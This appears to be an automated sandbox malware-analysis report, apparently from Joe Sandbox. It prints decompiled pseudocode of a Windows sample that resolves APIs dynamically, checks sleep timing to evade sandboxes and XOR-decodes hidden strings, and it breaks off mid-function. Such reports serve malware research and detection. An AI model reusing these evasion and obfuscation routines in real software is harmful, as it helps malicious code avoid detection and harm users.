				struct HINSTANCE__* _t18;
				CHAR* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t26;
				CHAR* _t28;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t30;
				CHAR* _t31;
				struct HINSTANCE__* _t32;
				CHAR* _t33;
				struct HINSTANCE__* _t34;
				CHAR* _t35;
				struct HINSTANCE__* _t36;
				CHAR* _t37;
				CHAR* _t38;
				CHAR* _t39;
				intOrPtr _t40;
				struct HINSTANCE__* _t41;
				CHAR* _t42;
				struct HINSTANCE__* _t43;
				CHAR* _t44;
				struct HINSTANCE__* _t45;
				CHAR* _t46;
				struct HINSTANCE__* _t47;

				if( *0x41aa64 != 0) {
					_t6 =  *0x41a1f0; // 0x610d10
					_t30 =  *0x41aa64; // 0x73b60000
					 *0x41aa14 = E0040C1B0(_t30, _t6);
					_t40 =  *0x41a474; // 0x610bc0
					_t8 =  *0x41aa64; // 0x73b60000
					 *0x41a970 = E0040C1B0(_t8, _t40);
					_t31 =  *0x41a718; // 0x610e00
					_t41 =  *0x41aa64; // 0x73b60000
					 *0x41aa8c = GetProcAddress(_t41, _t31);
					_t11 =  *0x41a33c; // 0x60f5d0
					_t32 =  *0x41aa64; // 0x73b60000
					 *0x41a88c = GetProcAddress(_t32, _t11);
					_t42 =  *0x41a5bc; // 0x60a948
					_t13 =  *0x41aa64; // 0x73b60000
					 *0x41aa68 = GetProcAddress(_t13, _t42);
					_t33 =  *0x41a4b0; // 0x610cf8
					_t43 =  *0x41aa64; // 0x73b60000
					 *0x41a9cc = GetProcAddress(_t43, _t33);
					_t16 =  *0x41a4c8; // 0x610b90
					_t34 =  *0x41aa64; // 0x73b60000
					 *0x41a9e4 = GetProcAddress(_t34, _t16);
					_t44 =  *0x41a7d4; // 0x610d58
					_t18 =  *0x41aa64; // 0x73b60000
					 *0x41a984 = GetProcAddress(_t18, _t44);
					_t35 =  *0x41a324; // 0x610b18
					_t45 =  *0x41aa64; // 0x73b60000
					 *0x41aa04 = GetProcAddress(_t45, _t35);
					_t21 =  *0x41a6f0; // 0x610d70
					_t36 =  *0x41aa64; // 0x73b60000
					 *0x41aa78 = GetProcAddress(_t36, _t21);
					_t46 =  *0x41a7b0; // 0x60a9a8
					_t23 =  *0x41aa64; // 0x73b60000
					 *0x41a9f4 = GetProcAddress(_t23, _t46);
					_t37 =  *0x41a218; // 0x60a9c8
					_t47 =  *0x41aa64; // 0x73b60000
					 *0x41aaa0 = GetProcAddress(_t47, _t37);
					_t26 =  *0x41aa64; // 0x73b60000
					 *0x41aa50 = GetProcAddress(_t26, "VirtualAllocExNuma");
				}
				_t28 =  *0x41a0f8; // 0x610c68
				_t1 = LoadLibraryA(_t28); // executed
				 *0x41a854 = _t1;
				_t38 =  *0x41a658; // 0x610c98
				_t2 = LoadLibraryA(_t38); // executed
				 *0x41a934 = _t2;
				if( *0x41a854 != 0) {
					_t5 =  *0x41a594; // 0x610da0
					_t29 =  *0x41a854; // 0x73ae0000
					_t2 = GetProcAddress(_t29, _t5);
					 *0x41a944 = _t2;
				}
				if( *0x41a934 != 0) {
					_t39 =  *0x41a0b8; // 0x60a9e8
					_t3 =  *0x41a934; // 0x76ae0000
					_t4 = GetProcAddress(_t3, _t39);
					 *0x41a9e0 = _t4;
					return _t4;
				}
				return _t2;
			}

0x0040c2ea
0x0040c2f0
0x0040c2f6
0x0040c305
0x0040c30a
0x0040c311
0x0040c31f
0x0040c324
0x0040c32b
0x0040c338
0x0040c33d
0x0040c343
0x0040c350
0x0040c355
0x0040c35c
0x0040c368
0x0040c36d
0x0040c374
0x0040c381
0x0040c386
0x0040c38c
0x0040c399
0x0040c39e
0x0040c3a5
0x0040c3b1
0x0040c3b6
0x0040c3bd
0x0040c3ca
0x0040c3cf
0x0040c3d5
0x0040c3e2
0x0040c3e7
0x0040c3ee
0x0040c3fa
0x0040c3ff
0x0040c406
0x0040c413
0x0040c41d
0x0040c429
0x0040c429
0x0040c42e
0x0040c435
0x0040c43b
0x0040c440
0x0040c447
0x0040c44d
0x0040c459
0x0040c45b
0x0040c461
0x0040c468
0x0040c46e
0x0040c46e
0x0040c47a
0x0040c47c
0x0040c483
0x0040c489
0x0040c48f
0x00000000
0x0040c48f
0x0040c495

APIs

GetProcAddress.KERNEL32(73B60000,00610E00), ref: 0040C332
GetProcAddress.KERNEL32(73B60000,0060F5D0), ref: 0040C34A
GetProcAddress.KERNEL32(73B60000,0060A948), ref: 0040C362
GetProcAddress.KERNEL32(73B60000,00610CF8), ref: 0040C37B
GetProcAddress.KERNEL32(73B60000,00610B90), ref: 0040C393
GetProcAddress.KERNEL32(73B60000,00610D58), ref: 0040C3AB
GetProcAddress.KERNEL32(73B60000,00610B18), ref: 0040C3C4
GetProcAddress.KERNEL32(73B60000,00610D70), ref: 0040C3DC
GetProcAddress.KERNEL32(73B60000,0060A9A8), ref: 0040C3F4
GetProcAddress.KERNEL32(73B60000,0060A9C8), ref: 0040C40D
GetProcAddress.KERNEL32(73B60000,VirtualAllocExNuma), ref: 0040C423
LoadLibraryA.KERNELBASE(00610C68,?,00406B72), ref: 0040C435
LoadLibraryA.KERNELBASE(00610C98,?,00406B72), ref: 0040C447
GetProcAddress.KERNEL32(73AE0000,00610DA0), ref: 0040C468
GetProcAddress.KERNEL32(76AE0000,0060A9E8), ref: 0040C489

Strings

Xa, xrefs: 0040C39E
pa, xrefs: 0040C3CF
VirtualAllocExNuma, xrefs: 0040C418

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: VirtualAllocExNuma$Xa$pa
API String ID: 2238633743-1517964976
Opcode ID: 2656e5721d2e72d8ddd254abdf4fc75b759c6e6593f162f059aa174bfdec3ac2
Instruction ID: a0d7b009b4cf0954f7e46bb6ba0f8cea1e563656be094aab1f3a6ea2fda818d0
Opcode Fuzzy Hash: 2656e5721d2e72d8ddd254abdf4fc75b759c6e6593f162f059aa174bfdec3ac2
Instruction Fuzzy Hash: A44165F5523200DFC344DFA8EE8899637B9BB8C251705CA39E50983672D7389561CF6E

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA0, Relevance: 4.5, APIs: 3, Instructions: 19
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406AA0() {
				long _v8;
				intOrPtr _v12;

				_v8 = GetTickCount();
				Sleep(0x2710); // executed
				_v12 = GetTickCount() - _v8;
				if(_v12 <= 0x1770) {
					return 0;
				}
				return 1;
			}

0x00406aac
0x00406ab4
0x00406ac3
0x00406acd
0x00000000
0x00406ad8
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00406AA6
Sleep.KERNELBASE(00002710,?,00406B84), ref: 00406AB4
GetTickCount.KERNEL32 ref: 00406ABA

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: 7f553c1e48c696f60989e1e45f98f64c256f88cb05cd9abfc45eb1fdc696742f
Instruction ID: 5e65db4bb8db0037cc9712db6db32af1b7f49a6c19175b0f31c2b6dd27f19f6d
Opcode Fuzzy Hash: 7f553c1e48c696f60989e1e45f98f64c256f88cb05cd9abfc45eb1fdc696742f
Instruction Fuzzy Hash: F8E04F30949118DBCB00BFB4D9080AD7BB0EB01342F10C0B29807A2280DA784D609F5B

Uniqueness

Uniqueness Score: -1.00%

Function 004048D0, Relevance: 3.1, APIs: 2, Instructions: 52
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004048D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				signed int _v16;
				void* _t28;
				signed int _t33;
				void* _t53;

				_t28 = LocalAlloc(0x40, _a12 + 1); // executed
				_v12 = _t28;
				 *((char*)(_v12 + _a12)) = 0;
				_v16 = 0;
				while(_v16 < _a12) {
					_t33 = E0040B740(_a4 + _v16, _a8);
					_t53 = _t53 + 4;
					 *((char*)(_v12 + _v16)) =  *(_a4 + _v16) ^  *(_a8 + _v16 % _t33);
					_v16 = _v16 + 1;
				}
				_v8 = 0;
				VirtualProtect(_v12, 4, 0x100,  &_v8); // executed
				return _v12;
			}

0x004048e0
0x004048e6
0x004048ef
0x004048f2
0x00404904
0x00404919
0x0040491e
0x00404939
0x00404901
0x00404901
0x0040493d
0x00404953
0x00404960

APIs

LocalAlloc.KERNELBASE(00000040,?), ref: 004048E0
VirtualProtect.KERNELBASE(?,00000004,00000100,00000000), ref: 00404953

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: AllocLocalProtectVirtual
String ID:
API String ID: 4134893223-0
Opcode ID: 90b564fceca7221074c59603a80da56f6d10dbde48e6bfe9d302259930e3f4f3
Instruction ID: 4623e7d36af2260dceec399572c1bb905ae2e9b6f15e47edd37a55d804c2928b
Opcode Fuzzy Hash: 90b564fceca7221074c59603a80da56f6d10dbde48e6bfe9d302259930e3f4f3
Instruction Fuzzy Hash: 561173B4E00248EFCB04DFA8C890BAEBBB5FF49305F108099EA15A7341C735AA11CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4A0, Relevance: 321.1, APIs: 144, Strings: 39, Instructions: 865
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040C4A0() {
				CHAR* _t2;
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t4;
				CHAR* _t6;
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				CHAR* _t10;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				CHAR* _t18;
				_Unknown_base(*)()* _t19;
				struct HINSTANCE__* _t20;
				CHAR* _t23;
				struct HINSTANCE__* _t25;
				CHAR* _t28;
				struct HINSTANCE__* _t30;
				CHAR* _t33;
				CHAR* _t34;
				struct HINSTANCE__* _t36;
				CHAR* _t37;
				struct HINSTANCE__* _t39;
				CHAR* _t41;
				struct HINSTANCE__* _t43;
				CHAR* _t46;
				struct HINSTANCE__* _t48;
				CHAR* _t50;
				struct HINSTANCE__* _t52;
				CHAR* _t55;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t59;
				CHAR* _t60;
				struct HINSTANCE__* _t61;
				CHAR* _t64;
				struct HINSTANCE__* _t66;
				CHAR* _t69;
				struct HINSTANCE__* _t71;
				CHAR* _t74;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				struct HINSTANCE__* _t81;
				CHAR* _t83;
				struct HINSTANCE__* _t85;
				CHAR* _t88;
				struct HINSTANCE__* _t90;
				struct HINSTANCE__* _t92;
				CHAR* _t95;
				struct HINSTANCE__* _t97;
				CHAR* _t100;
				struct HINSTANCE__* _t102;
				CHAR* _t105;
				struct HINSTANCE__* _t107;
				CHAR* _t110;
				struct HINSTANCE__* _t112;
				CHAR* _t115;
				struct HINSTANCE__* _t117;
				CHAR* _t120;
				struct HINSTANCE__* _t122;
				CHAR* _t124;
				struct HINSTANCE__* _t127;
				CHAR* _t128;
				struct HINSTANCE__* _t130;
				CHAR* _t133;
				struct HINSTANCE__* _t135;
				CHAR* _t138;
				struct HINSTANCE__* _t140;
				CHAR* _t143;
				struct HINSTANCE__* _t145;
				CHAR* _t148;
				struct HINSTANCE__* _t150;
				CHAR* _t153;
				struct HINSTANCE__* _t155;
				CHAR* _t158;
				struct HINSTANCE__* _t160;
				CHAR* _t163;
				struct HINSTANCE__* _t165;
				CHAR* _t168;
				struct HINSTANCE__* _t170;
				CHAR* _t173;
				struct HINSTANCE__* _t175;
				CHAR* _t178;
				struct HINSTANCE__* _t180;
				CHAR* _t183;
				struct HINSTANCE__* _t185;
				CHAR* _t188;
				struct HINSTANCE__* _t190;
				CHAR* _t193;
				struct HINSTANCE__* _t195;
				CHAR* _t198;
				struct HINSTANCE__* _t200;
				CHAR* _t203;
				struct HINSTANCE__* _t205;
				CHAR* _t208;
				struct HINSTANCE__* _t210;
				struct HINSTANCE__* _t213;
				struct HINSTANCE__* _t217;
				CHAR* _t220;
				CHAR* _t221;
				CHAR* _t222;
				CHAR* _t223;
				struct HINSTANCE__* _t224;
				CHAR* _t225;
				CHAR* _t226;
				struct HINSTANCE__* _t227;
				CHAR* _t228;
				struct HINSTANCE__* _t229;
				CHAR* _t230;
				struct HINSTANCE__* _t231;
				struct HINSTANCE__* _t232;
				struct HINSTANCE__* _t233;
				CHAR* _t234;
				struct HINSTANCE__* _t235;
				CHAR* _t236;
				struct HINSTANCE__* _t237;
				CHAR* _t238;
				struct HINSTANCE__* _t239;
				CHAR* _t240;
				struct HINSTANCE__* _t241;
				CHAR* _t242;
				CHAR* _t243;
				struct HINSTANCE__* _t244;
				CHAR* _t245;
				struct HINSTANCE__* _t246;
				CHAR* _t247;
				struct HINSTANCE__* _t248;
				CHAR* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t251;
				struct HINSTANCE__* _t252;
				CHAR* _t253;
				struct HINSTANCE__* _t254;
				CHAR* _t255;
				struct HINSTANCE__* _t256;
				struct HINSTANCE__* _t257;
				CHAR* _t258;
				struct HINSTANCE__* _t259;
				CHAR* _t260;
				struct HINSTANCE__* _t261;
				CHAR* _t262;
				struct HINSTANCE__* _t263;
				CHAR* _t264;
				CHAR* _t265;
				struct HINSTANCE__* _t266;
				CHAR* _t267;
				struct HINSTANCE__* _t268;
				CHAR* _t269;
				struct HINSTANCE__* _t270;
				struct HINSTANCE__* _t271;
				struct HINSTANCE__* _t272;
				struct HINSTANCE__* _t273;
				CHAR* _t274;
				struct HINSTANCE__* _t275;
				CHAR* _t276;
				struct HINSTANCE__* _t277;
				CHAR* _t278;
				struct HINSTANCE__* _t279;
				CHAR* _t280;
				struct HINSTANCE__* _t281;
				CHAR* _t282;
				struct HINSTANCE__* _t283;
				CHAR* _t284;
				struct HINSTANCE__* _t285;
				CHAR* _t286;
				struct HINSTANCE__* _t287;
				CHAR* _t288;
				struct HINSTANCE__* _t289;
				CHAR* _t290;
				struct HINSTANCE__* _t291;
				CHAR* _t292;
				struct HINSTANCE__* _t293;
				CHAR* _t294;
				struct HINSTANCE__* _t295;
				CHAR* _t296;
				struct HINSTANCE__* _t297;
				CHAR* _t298;
				struct HINSTANCE__* _t299;
				CHAR* _t300;
				struct HINSTANCE__* _t301;
				CHAR* _t302;
				struct HINSTANCE__* _t303;
				CHAR* _t304;
				struct HINSTANCE__* _t305;
				CHAR* _t306;
				struct HINSTANCE__* _t307;
				struct HINSTANCE__* _t308;
				CHAR* _t309;
				CHAR* _t310;
				CHAR* _t311;
				CHAR* _t312;
				CHAR* _t313;
				CHAR* _t314;
				struct HINSTANCE__* _t315;
				struct HINSTANCE__* _t316;
				CHAR* _t317;
				struct HINSTANCE__* _t318;
				CHAR* _t319;
				struct HINSTANCE__* _t320;
				CHAR* _t321;
				CHAR* _t322;
				struct HINSTANCE__* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				CHAR* _t326;
				struct HINSTANCE__* _t327;
				CHAR* _t328;
				struct HINSTANCE__* _t329;
				CHAR* _t330;
				struct HINSTANCE__* _t331;
				struct HINSTANCE__* _t332;
				CHAR* _t333;
				CHAR* _t334;
				struct HINSTANCE__* _t335;
				CHAR* _t336;
				struct HINSTANCE__* _t337;
				CHAR* _t338;
				struct HINSTANCE__* _t339;
				CHAR* _t340;
				struct HINSTANCE__* _t341;
				CHAR* _t342;
				struct HINSTANCE__* _t343;
				CHAR* _t344;
				struct HINSTANCE__* _t345;
				CHAR* _t346;
				CHAR* _t347;
				struct HINSTANCE__* _t348;
				CHAR* _t349;
				struct HINSTANCE__* _t350;
				CHAR* _t351;
				struct HINSTANCE__* _t352;
				CHAR* _t353;
				struct HINSTANCE__* _t354;
				struct HINSTANCE__* _t355;
				CHAR* _t356;
				struct HINSTANCE__* _t357;
				CHAR* _t358;
				struct HINSTANCE__* _t359;
				CHAR* _t360;
				struct HINSTANCE__* _t361;
				CHAR* _t362;
				struct HINSTANCE__* _t363;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				struct HINSTANCE__* _t367;
				CHAR* _t368;
				struct HINSTANCE__* _t369;
				CHAR* _t370;
				struct HINSTANCE__* _t371;
				CHAR* _t372;
				struct HINSTANCE__* _t373;
				CHAR* _t374;
				struct HINSTANCE__* _t375;
				CHAR* _t376;
				struct HINSTANCE__* _t377;
				CHAR* _t378;
				struct HINSTANCE__* _t379;
				CHAR* _t380;
				struct HINSTANCE__* _t381;
				CHAR* _t382;
				struct HINSTANCE__* _t383;
				CHAR* _t384;
				struct HINSTANCE__* _t385;
				CHAR* _t386;
				struct HINSTANCE__* _t387;
				CHAR* _t388;
				struct HINSTANCE__* _t389;
				CHAR* _t390;
				struct HINSTANCE__* _t391;
				CHAR* _t392;
				struct HINSTANCE__* _t393;
				CHAR* _t394;
				struct HINSTANCE__* _t395;
				struct HINSTANCE__* _t396;

				if( *0x41aa64 != 0) {
					_t128 =  *0x41a0b4; // 0x627fc0
					_t273 =  *0x41aa64; // 0x73b60000
					 *0x41a9b4 = GetProcAddress(_t273, _t128);
					_t362 =  *0x41a728; // 0x627ff0
					_t130 =  *0x41aa64; // 0x73b60000
					 *0x41aa24 = GetProcAddress(_t130, _t362);
					_t274 =  *0x41a2bc; // 0x625b50
					_t363 =  *0x41aa64; // 0x73b60000
					 *0x41a9bc = GetProcAddress(_t363, _t274);
					_t133 =  *0x41a668; // 0x627f30
					_t275 =  *0x41aa64; // 0x73b60000
					 *0x41a8b0 = GetProcAddress(_t275, _t133);
					_t364 =  *0x41a5d8; // 0x627df8
					_t135 =  *0x41aa64; // 0x73b60000
					 *0x41a910 = GetProcAddress(_t135, _t364);
					_t276 =  *0x41a26c; // 0x627e28
					_t365 =  *0x41aa64; // 0x73b60000
					 *0x41a8b8 = GetProcAddress(_t365, _t276);
					_t138 =  *0x41a64c; // 0x627d50
					_t277 =  *0x41aa64; // 0x73b60000
					 *0x41aa90 = GetProcAddress(_t277, _t138);
					_t366 =  *0x41a4b8; // 0x627d80
					_t140 =  *0x41aa64; // 0x73b60000
					 *0x41a908 = GetProcAddress(_t140, _t366);
					_t278 =  *0x41a2b4; // 0x627e88
					_t367 =  *0x41aa64; // 0x73b60000
					 *0x41aa70 = GetProcAddress(_t367, _t278);
					_t143 =  *0x41a7bc; // 0x627e58
					_t279 =  *0x41aa64; // 0x73b60000
					 *0x41a9d8 = GetProcAddress(_t279, _t143);
					_t368 =  *0x41a49c; // 0x627e70
					_t145 =  *0x41aa64; // 0x73b60000
					 *0x41aa10 = GetProcAddress(_t145, _t368);
					_t280 =  *0x41a4fc; // 0x627ea0
					_t369 =  *0x41aa64; // 0x73b60000
					 *0x41a8cc = GetProcAddress(_t369, _t280);
					_t148 =  *0x41a3a8; // 0x627d98
					_t281 =  *0x41aa64; // 0x73b60000
					 *0x41aa9c = GetProcAddress(_t281, _t148);
					_t370 =  *0x41a1c0; // 0x6259b0
					_t150 =  *0x41aa64; // 0x73b60000
					 *0x41a998 = GetProcAddress(_t150, _t370);
					_t282 =  *0x41a1f8; // 0x627f60
					_t371 =  *0x41aa64; // 0x73b60000
					 *0x41a9a0 = GetProcAddress(_t371, _t282);
					_t153 =  *0x41a7ac; // 0x625830
					_t283 =  *0x41aa64; // 0x73b60000
					 *0x41aaac = GetProcAddress(_t283, _t153);
					_t372 =  *0x41a5f8; // 0x627218
					_t155 =  *0x41aa64; // 0x73b60000
					 *0x41a904 = GetProcAddress(_t155, _t372);
					_t284 =  *0x41a0dc; // 0x627db0
					_t373 =  *0x41aa64; // 0x73b60000
					 *0x41aac4 = GetProcAddress(_t373, _t284);
					_t158 =  *0x41a30c; // 0x6259d0
					_t285 =  *0x41aa64; // 0x73b60000
					 *0x41a86c = GetProcAddress(_t285, _t158);
					_t374 =  *0x41a664; // 0x627f78
					_t160 =  *0x41aa64; // 0x73b60000
					 *0x41a8fc = GetProcAddress(_t160, _t374);
					_t286 =  *0x41a04c; // 0x6259f0
					_t375 =  *0x41aa64; // 0x73b60000
					 *0x41aad0 = GetProcAddress(_t375, _t286);
					_t163 =  *0x41a0f0; // 0x627cd8
					_t287 =  *0x41aa64; // 0x73b60000
					 *0x41aa44 = GetProcAddress(_t287, _t163);
					_t376 =  *0x41a134; // 0x627f18
					_t165 =  *0x41aa64; // 0x73b60000
					 *0x41a974 = GetProcAddress(_t165, _t376);
					_t288 =  *0x41a460; // 0x627eb8
					_t377 =  *0x41aa64; // 0x73b60000
					 *0x41a8e4 = GetProcAddress(_t377, _t288);
					_t168 =  *0x41a554; // 0x627ed0
					_t289 =  *0x41aa64; // 0x73b60000
					 *0x41a868 = GetProcAddress(_t289, _t168);
					_t378 =  *0x41a190; // 0x6256d0
					_t170 =  *0x41aa64; // 0x73b60000
					 *0x41a96c = GetProcAddress(_t170, _t378);
					_t290 =  *0x41a52c; // 0x627c90
					_t379 =  *0x41aa64; // 0x73b60000
					 *0x41aad8 = GetProcAddress(_t379, _t290);
					_t173 =  *0x41a5d0; // 0x627ee8
					_t291 =  *0x41aa64; // 0x73b60000
					 *0x41a930 = GetProcAddress(_t291, _t173);
					_t380 =  *0x41a268; // 0x627f48
					_t175 =  *0x41aa64; // 0x73b60000
					 *0x41a8a8 = GetProcAddress(_t175, _t380);
					_t292 =  *0x41a3f8; // 0x6253f0
					_t381 =  *0x41aa64; // 0x73b60000
					 *0x41a894 = GetProcAddress(_t381, _t292);
					_t178 =  *0x41a3a4; // 0x6286c8
					_t293 =  *0x41aa64; // 0x73b60000
					 *0x41a8c4 = GetProcAddress(_t293, _t178);
					_t382 =  *0x41a048; // 0x6286e0
					_t180 =  *0x41aa64; // 0x73b60000
					 *0x41a914 = GetProcAddress(_t180, _t382);
					_t294 =  *0x41a6b0; // 0x6287b8
					_t383 =  *0x41aa64; // 0x73b60000
					 *0x41a8b4 = GetProcAddress(_t383, _t294);
					_t183 =  *0x41a458; // 0x628758
					_t295 =  *0x41aa64; // 0x73b60000
					 *0x41a9dc = GetProcAddress(_t295, _t183);
					_t384 =  *0x41a364; // 0x628728
					_t185 =  *0x41aa64; // 0x73b60000
					 *0x41aad4 = GetProcAddress(_t185, _t384);
					_t296 =  *0x41a550; // 0x6255d0
					_t385 =  *0x41aa64; // 0x73b60000
					 *0x41a8a4 = GetProcAddress(_t385, _t296);
					_t188 =  *0x41a13c; // 0x625710
					_t297 =  *0x41aa64; // 0x73b60000
					 *0x41a8a0 = GetProcAddress(_t297, _t188);
					_t386 =  *0x41a428; // 0x628710
					_t190 =  *0x41aa64; // 0x73b60000
					 *0x41aa20 = GetProcAddress(_t190, _t386);
					_t298 =  *0x41a420; // 0x628830
					_t387 =  *0x41aa64; // 0x73b60000
					 *0x41a9d4 = GetProcAddress(_t387, _t298);
					_t193 =  *0x41a02c; // 0x625590
					_t299 =  *0x41aa64; // 0x73b60000
					 *0x41aab0 = GetProcAddress(_t299, _t193);
					_t388 =  *0x41a184; // 0x626f48
					_t195 =  *0x41aa64; // 0x73b60000
					 *0x41a9a4 = GetProcAddress(_t195, _t388);
					_t300 =  *0x41a118; // 0x628698
					_t389 =  *0x41aa64; // 0x73b60000
					 *0x41a8c8 = GetProcAddress(_t389, _t300);
					_t198 =  *0x41a1a4; // 0x628740
					_t301 =  *0x41aa64; // 0x73b60000
					 *0x41a860 = GetProcAddress(_t301, _t198);
					_t390 =  *0x41a400; // 0x6256b0
					_t200 =  *0x41aa64; // 0x73b60000
					 *0x41a9b0 = GetProcAddress(_t200, _t390);
					_t302 =  *0x41a654; // 0x625490
					_t391 =  *0x41aa64; // 0x73b60000
					 *0x41a8f4 = GetProcAddress(_t391, _t302);
					_t203 =  *0x41a3dc; // 0x6254b0
					_t303 =  *0x41aa64; // 0x73b60000
					 *0x41a850 = GetProcAddress(_t303, _t203);
					_t392 =  *0x41a2dc; // 0x6286f8
					_t205 =  *0x41aa64; // 0x73b60000
					 *0x41a858 = GetProcAddress(_t205, _t392);
					_t304 =  *0x41a5f4; // 0x625550
					_t393 =  *0x41aa64; // 0x73b60000
					 *0x41a92c = GetProcAddress(_t393, _t304);
					_t208 =  *0x41a780; // 0x6287d0
					_t305 =  *0x41aa64; // 0x73b60000
					 *0x41a978 = GetProcAddress(_t305, _t208);
					_t394 =  *0x41a0d8; // 0x6256f0
					_t210 =  *0x41aa64; // 0x73b60000
					 *0x41aa1c = GetProcAddress(_t210, _t394);
					_t306 =  *0x41a6ac; // 0x625630
					_t395 =  *0x41aa64; // 0x73b60000
					 *0x41a890 = GetProcAddress(_t395, _t306);
					_t213 =  *0x41aa64; // 0x73b60000
					 *0x41aa58 = GetProcAddress(_t213, "CreateThread");
					_t307 =  *0x41aa64; // 0x73b60000
					 *0x41a8e8 = GetProcAddress(_t307, "GetEnvironmentVariableA");
					_t396 =  *0x41aa64; // 0x73b60000
					 *0x41a8ac = GetProcAddress(_t396, "SetEnvironmentVariableA");
					_t217 =  *0x41aa64; // 0x73b60000
					 *0x41aac8 = GetProcAddress(_t217, "lstrcpyA");
					_t308 =  *0x41aa64; // 0x73b60000
					 *0x41a994 = GetProcAddress(_t308, "lstrcpynA");
				}
				_t309 =  *0x41a03c; // 0x628008
				 *0x41a964 = LoadLibraryA(_t309);
				_t2 =  *0x41a1e4; // 0x628050
				_t3 = LoadLibraryA(_t2); // executed
				 *0x41a8d8 = _t3;
				_t220 =  *0x41a5fc; // 0x627f00
				_t4 = LoadLibraryA(_t220); // executed
				 *0x41aaa8 = _t4;
				_t310 =  *0x41a2c0; // 0x627d68
				 *0x41a988 = LoadLibraryA(_t310);
				_t6 =  *0x41a240; // 0x627de0
				_t7 = LoadLibraryA(_t6); // executed
				 *0x41aa40 = _t7;
				_t221 =  *0x41a77c; // 0x627dc8
				_t8 = LoadLibraryA(_t221); // executed
				 *0x41a94c = _t8;
				_t311 =  *0x41a1e0; // 0x627e10
				_t9 = LoadLibraryA(_t311); // executed
				 *0x41aa34 = _t9;
				_t10 =  *0x41a568; // 0x627cf0
				_t11 = LoadLibraryA(_t10); // executed
				 *0x41aa80 = _t11;
				_t222 =  *0x41a0a4; // 0x627d08
				_t12 = LoadLibraryA(_t222); // executed
				 *0x41a968 = _t12;
				_t312 =  *0x41a5a0; // 0x627ca8
				_t13 = LoadLibraryA(_t312); // executed
				 *0x41aa98 = _t13;
				_t14 =  *0x41a688; // 0x627d20
				_t15 = LoadLibraryA(_t14); // executed
				 *0x41a938 = _t15;
				_t223 =  *0x41a228; // 0x627cc0
				_t16 = LoadLibraryA(_t223); // executed
				 *0x41a97c = _t16;
				_t313 =  *0x41a58c; // 0x627d38
				_t17 = LoadLibraryA(_t313); // executed
				 *0x41aa88 = _t17;
				if( *0x41a964 != 0) {
					_t124 =  *0x41a4a0; // 0x627bf0
					_t272 =  *0x41a964; // 0x770b0000
					 *0x41aa54 = GetProcAddress(_t272, _t124);
					_t361 =  *0x41a964; // 0x770b0000
					 *0x41a85c = GetProcAddress(_t361, "memset");
					_t127 =  *0x41a964; // 0x770b0000
					_t17 = GetProcAddress(_t127, "memcpy");
					 *0x41aab8 = _t17;
				}
				if( *0x41a8d8 != 0) {
					_t265 =  *0x41a490; // 0x6287e8
					_t355 =  *0x41a8d8; // 0x6f710000
					 *0x41a954 = GetProcAddress(_t355, _t265);
					_t110 =  *0x41a25c; // 0x625610
					_t266 =  *0x41a8d8; // 0x6f710000
					 *0x41aa74 = GetProcAddress(_t266, _t110);
					_t356 =  *0x41a530; // 0x625510
					_t112 =  *0x41a8d8; // 0x6f710000
					 *0x41aabc = GetProcAddress(_t112, _t356);
					_t267 =  *0x41a560; // 0x625730
					_t357 =  *0x41a8d8; // 0x6f710000
					 *0x41aa3c = GetProcAddress(_t357, _t267);
					_t115 =  *0x41a3d4; // 0x628800
					_t268 =  *0x41a8d8; // 0x6f710000
					 *0x41aacc = GetProcAddress(_t268, _t115);
					_t358 =  *0x41a23c; // 0x625410
					_t117 =  *0x41a8d8; // 0x6f710000
					 *0x41a950 = GetProcAddress(_t117, _t358);
					_t269 =  *0x41a564; // 0x625450
					_t359 =  *0x41a8d8; // 0x6f710000
					 *0x41a980 = GetProcAddress(_t359, _t269);
					_t120 =  *0x41a45c; // 0x6255f0
					_t270 =  *0x41a8d8; // 0x6f710000
					 *0x41a84c = GetProcAddress(_t270, _t120);
					_t360 =  *0x41a278; // 0x625750
					_t122 =  *0x41a8d8; // 0x6f710000
					 *0x41a958 = GetProcAddress(_t122, _t360);
					_t271 =  *0x41a8d8; // 0x6f710000
					_t17 = GetProcAddress(_t271, "InternetCrackUrlA");
					 *0x41a8ec = _t17;
				}
				if( *0x41aaa8 != 0) {
					_t347 =  *0x41a318; // 0x628770
					_t92 =  *0x41aaa8; // 0x745c0000
